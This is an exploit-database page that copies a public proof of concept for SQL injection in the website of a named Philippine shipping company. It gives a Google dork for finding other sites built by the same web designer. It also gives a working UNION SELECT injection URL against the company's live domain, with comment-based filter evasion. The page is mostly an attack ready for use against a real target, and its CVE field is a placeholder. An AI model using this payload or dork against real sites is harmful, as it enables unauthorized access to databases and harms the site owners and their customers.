Advertisement






Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-03-14
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030062

Below is a copy:

Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability
*********************************************************
#Exploit Title: Montenegro Shipping Lines, Inc. - SQL Injection Vulnerability
#Date: 2022-03-14
#Exploit Author: Jayson San Buenaventura
#Google Dork: "Designed by Rushtek Enterprise"
#Category: webapps
#Tested On: Parrot Sec, CyberFox
 
 
Proof of Concept:
Search google Dork: "Designed by Rushtek Enterprise"


### Demo :

https://montenegrolines.com.ph/inquery-single.php?news_id=-2'+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7--+

********************************************************* 
#Discovered by: Jayson San Buenaventura
#Facebook: Jayson Cabrillas San Buenaventura
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.